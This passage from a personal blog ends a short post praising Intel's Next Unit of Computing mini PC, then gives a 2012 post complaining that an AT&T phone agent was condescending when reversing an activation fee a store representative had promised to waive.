So, I save space in the house, the machine runs way faster (solid state vs. a traditional hard drive), and I save energy. What's not to like? Very cool box.

Permalink: Intel's Next Unit of Computing

Frustrating Customer Service Agent at AT&T

November 30, 2012

On October 8, 2012, I went to my local AT&T store to get a prepaid SIM card. I just needed an extra phone for about 4 months with voice service only. The representative at the store suggested that I just add a line to my current monthly plan, since I'd probably save money that way. He said he would waive the activation fee and the contract period for the new line. So, rather than paying $25/mo for the prepaid card, I could pay just $10/mo on my existing plan (plus taxes, 911 fees, etc.). In all, I could probably save 50% that way. He made a kind offer, likely because I've been an AT&T customer for a long time.

He printed out the service summary sheet and marked through the things that were waived.

Though this was the agreement we had, I was charged the activation fee on my bill this past month. Oh, well. Mistakes happen, right? So, I called AT&T to get it corrected.

The lady was absolutely horrible. I don't think she believed me, and she spoke down to me as if I were a peasant. She really had a condescending tone to her voice. She told me, "We'll waive the fee this one time, but we'll put a note on your account, and if you add another line, we will not waive the fee again." So, now she's doing me a favor? Or was this a threat? I can't tell which. Between the tone of voice, the suggestion that she's doing me a favor "this one time", and the threat that AT&T will never extend an offer to waive an activation fee again, I got mad.

Sometimes, I really, really hate AT&T. Working in the communications business, I have a number of friends who work for AT&T and I've worked with their engineers on projects. The company has many good people, but representatives like this battle ax are what frustrate customers and drive them elsewhere.

Permalink: Frustrating Customer Service Agent at AT&T